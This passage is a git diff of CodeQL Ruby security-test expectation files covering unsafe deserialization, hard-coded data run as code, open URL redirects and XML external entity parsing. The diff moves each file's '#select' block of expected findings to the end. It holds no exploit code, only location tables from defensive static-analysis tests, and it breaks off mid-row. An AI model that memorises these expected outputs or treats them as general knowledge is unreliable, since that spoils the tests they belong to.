UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | -| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | -| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | -| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | -| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | edges | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | provenance | | | UnsafeDeserialization.rb:11:23:11:50 | call to decode64 | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | provenance | | 
@@ -157,3 +129,31 @@ nodes | UnsafeDeserialization.rb:170:24:170:27 | call to gets | semmle.label | call to gets | | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | semmle.label | call to readlines | subpaths +#select +| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | +| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | +| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | +| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | +| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | +| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | +| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected index fe3a1d20a041..2935e15cbd6e 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected +++ b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected @@ -1,7 +1,3 @@ -#select -| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | -| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | -| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | edges | tst.rb:1:7:1:7 | r : String | tst.rb:2:4:2:4 | r : String | provenance | | | tst.rb:2:3:2:5 | call to [] : Array [element 0] : String | tst.rb:2:3:2:15 | call to pack | provenance | Config | 
@@ -33,3 +29,7 @@ nodes subpaths | tst.rb:7:8:7:30 | totally_harmless_string : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:7:6:7:31 | call to e | | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:10:9:10:25 | call to e | +#select +| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | +| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | +| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected index 7df096e2d2fa..cd2845ea7a56 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected 
@@ -1,14 +1,3 @@ -#select -| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | -| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | -| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | -| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | -| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | -| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | -| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | -| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. 
| UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | -| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | -| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | edges | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | provenance | | | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | provenance | | 
@@ -51,3 +40,14 @@ nodes | UrlRedirect.rb:94:5:94:29 | call to permit | semmle.label | call to permit | subpaths | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:93:21:93:32 | input_params | UrlRedirect.rb:94:5:94:29 | call to permit | UrlRedirect.rb:24:17:24:37 | call to filter_params | +#select +| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | +| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | +| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | +| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | +| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | +| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | +| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] 
| Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | +| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | +| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | +| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected index 787038e80f2b..d819e92c9305 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected 
@@ -1,8 +1,3 @@ -#select -| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | edges | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:18:30:18:36 | content | provenance | | | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:19:19:19:25 | content | provenance | | 
@@ -19,3 +14,8 @@ nodes | LibXmlBackend.rb:20:27:20:33 | content | semmle.label | content | | LibXmlBackend.rb:21:34:21:40 | content | semmle.label | content | subpaths +#select +| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected index d6f2cdb6d2ac..44acc636b600 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected 
@@ -1,27 +1,3 @@ -#select -| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | edges | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:4:34:4:40 | content | provenance | | | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:5:32:5:38 | content | provenance | | 
@@ -81,3 +57,27 @@ nodes | Nokogiri.rb:27:26:27:32 | content | semmle.label | content | | Nokogiri.rb:28:26:28:32 | content | semmle.label | content | subpaths +#select +| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without 